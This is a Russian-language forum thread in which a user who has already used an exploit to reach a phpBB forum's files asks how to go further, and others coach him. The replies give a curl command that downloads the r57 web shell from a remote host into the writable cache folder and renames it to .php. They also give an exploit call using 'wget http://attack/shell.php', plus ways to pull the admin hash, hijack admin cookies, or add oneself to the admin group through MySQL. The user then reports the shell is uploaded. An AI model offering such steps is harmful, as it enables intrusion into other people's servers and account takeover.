![]() |
phpBB. Взял Config.php. А как дальше?
C помощю эксплоита получил доступ к файлам форума. Работают команды cat, ls, uname, rm, echo, mkdir и т.д.
Содержимое файла config.php : PHP код:
Подскажите пожалуйсто какой должен быть следющий шаг? |
Залить шелл, оттуда выудить через MySQL hash админа и его sid. Спокойно подменить cookies и смотреть.....
Самый простой способ лить в папку cаche, она на запись всегда разрешена. И curl почти везде есть. Значит пробираешь pwd(узнаешь папку в которой ты находишся). И пишешь curl -o путь/cache/file.txt http://rst.void.ru/download/r57shell.txt .... А потом cp путь/cache/file.txt путь/cache/file.php , и идешь путь/cache/file.php Все расписал подробнее нельзя. |
Цитата:
т.е. пример будет такого типа: perl phpbb.pl www.xxx.ru /forum/ 3128 "wget http://attack/shell.php" Если да то обращение через браузер должен быть таким: www.xxx.ru/forum/shell.php ? команда PWD: root@omega: pwd -------------------------------- /usr/home/www/xxx/xxx/forum |
хм... если просто смотреть админские разделы то зачем аж так парится? :) простая кся и по кукам админа заходишь ;) ну для могучих перцев можно и вправду залить шелл командой wget(или другой смотря что пашет) и узнавать хэш админа потом его разшифрововать.... кста а нах заливать шел чтоб лазить по мискле?
разве mysql -D -h -u -p ктонить отменял? :Р и вообще если тебе известно всё по мискле то по выше перечисленой команде можно и апдейтнуть себя и перевести в группу админов ;) |
Цитата:
|
Есть! Шелл р57 залит.
|
bl4ck-cat
ТЫ гений чтоли...... Каким макаром ты подменишь куки в версиях старше 2.0.12 и станешь при этом админом? Научи я тоже так хочу. Cnekmp Набери ls -l посмотри какие еще папки доступны на запись.... около них будет написано drwxrwxrwx |
Теперь с помощю шелла какой шаг нужно сделать?
|
Цитата:
|
Диманыч
я не говорил что можно через подмену куков сделать себя админом О_о я дал 2 способа: подменить свои куки на куки админа и заходить как этот админ и 2 способ через мускуль добавить себя в админ группу О_о ведь если у тебя есть все данные про бд мускуля чем бы не поизменять там чего? о_О |
| Время: 17:05 |